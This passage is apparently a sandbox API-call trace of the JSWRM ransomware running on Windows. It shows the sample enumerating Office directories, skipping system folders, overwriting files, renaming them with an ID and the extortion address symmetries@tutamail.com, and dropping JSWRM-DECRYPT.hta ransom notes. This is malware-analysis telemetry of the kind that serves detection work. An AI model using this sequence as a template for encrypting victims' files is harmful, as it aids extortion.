lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.Culture.msi.16_proof.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0112.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0112.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0112.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0112.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\Proof.Culture.msi.16_proof.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\es-es\\proof.culture.msi.16_proof.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.919] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=86930) returned 1 [0112.919] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15390) returned 0x24c1d0 [0112.920] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x15390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x15390, lpOverlapped=0x0) returned 1 [0112.928] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.928] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x15390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x15390, lpOverlapped=0x0) returned 1 [0112.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.929] CloseHandle (hObject=0x238) returned 1 [0112.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0112.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0112.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0112.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0112.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0112.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.930] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\Proof.Culture.msi.16_proof.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\es-es\\proof.culture.msi.16_proof.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\Proof.Culture.msi.16_proof.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\es-es\\proof.culture.msi.16_proof.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.931] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15392, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Proof.Culture.msi.16_proof.mcxml", cAlternateFileName="PROOFC~1.MCX")) returned 0 [0112.931] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0112.931] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99473dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2=".") returned 1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="..") returned 1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="...") returned 1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="windows") returned -1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="recovery") returned -1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="perflogs") returned -1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="documents and settings") returned 1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="$RECYCLE.BIN") returned 1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="system volume information") returned -1 [0112.931] lstrcmpiW (lpString1="fr-fr", lpString2="msocache") returned -1 [0112.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0112.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0112.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0112.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b2b8 [0112.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0112.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\fr-fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\fr-fr\\jswrm-decrypt.hta")) returned 0xffffffff [0112.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0112.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0112.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0112.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0112.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0112.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0112.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b5d8 [0112.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0112.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\fr-fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\fr-fr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.933] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.933] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0112.934] CloseHandle (hObject=0x45c) returned 1 [0112.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0112.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0112.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0112.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0112.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0112.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0112.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b768 [0112.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0112.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\fr-fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\fr-fr\\jswrm-decrypt.hta")) returned 0x20 [0112.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0112.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0112.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0112.935] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\fr-fr\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x39f89417, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName=".", cAlternateFileName="")) returned 0x232140 [0112.935] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0112.935] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x39f89417, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="..", cAlternateFileName="")) returned 1 [0112.935] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0112.935] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0112.935] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f89417, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x39f89417, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x39f89417, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0112.936] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0112.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0112.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0112.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0112.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0112.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.936] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x996d62b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15276, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Proof.Culture.msi.16_proof.mcxml", cAlternateFileName="PROOFC~1.MCX")) returned 1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2=".") returned 1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="..") returned 1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="...") returned 1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="windows") returned -1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="recovery") returned -1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="perflogs") returned 1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="documents and settings") returned 1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.936] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="system volume information") returned -1 [0112.937] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="msocache") returned 1 [0112.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0112.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.Culture.msi.16_proof.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0112.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0112.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.Culture.msi.16_proof.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0112.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0112.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0112.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\fr-fr\\Proof.Culture.msi.16_proof.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\fr-fr\\proof.culture.msi.16_proof.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.938] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=86646) returned 1 [0112.938] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15270) returned 0x24c1d0 [0112.938] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x15270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x15270, lpOverlapped=0x0) returned 1 [0112.978] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.978] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x15270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x15270, lpOverlapped=0x0) returned 1 [0112.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.979] CloseHandle (hObject=0x238) returned 1 [0112.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0112.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0112.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0112.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0112.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0112.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0112.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.980] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 